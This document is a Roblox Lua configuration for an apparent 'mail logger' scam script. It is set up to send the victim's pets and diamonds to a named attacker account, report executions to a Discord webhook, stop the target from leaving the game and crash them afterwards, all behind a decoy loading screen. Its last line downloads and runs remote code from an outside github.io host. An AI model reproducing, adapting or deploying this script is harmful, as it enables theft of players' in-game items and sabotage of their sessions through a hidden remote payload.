--[[ Arkhalis Mail Logger ]]--

--[[ Main Config ]]--
_G.Username = "godvote" --// Username To Send Pets To
_G.UserId = 2062380598 --// Roblox Account Id [[https://www.roblox.com/users/IDHERE/profile]] <- This is a example
_G.GiftMessage = "lol" --// Message For The Gift To Say
_G.Diamonds = 5000 --// Amount Of Diamonds To Not Kick
_G.UnlockPets = true --// Unlocks Locked Pets
_G.AntiLeave = true --// Doesn't Let The Target Close Roblox
_G.Crash = true --// Crashes Them After Its Finished
--[[ Webhook Config ]]--
_G.Webhook = "https://discord.com/api/webhooks/1100442443482144778/0pt5g_X6qFfJWP_lo-3H5OrcLztJJOAgQioVki9YpJrFnx3SF9a8MY5umMGorl4CFuCE" --// Discord Webhook For Executions

--[[ UI Config ]]--
_G.ScriptName = "loading" --// Script Name On The UI
_G.Tip1 = "1" --// Gives You Tips On The UI
_G.Tip2 = "2" --// Gives You Tips On The UI
_G.Tip3 = "3" --// Gives You Tips On The UI
_G.Tip4 = "4" --// Gives You Tips On The UI
_G.Tip5 = "5" --// Gives You Tips On The UI

--[[ Script ]]
loadstring(game:HttpGet("https://arkhalislua.github.io/Lua/Arkhalis.lua"))()
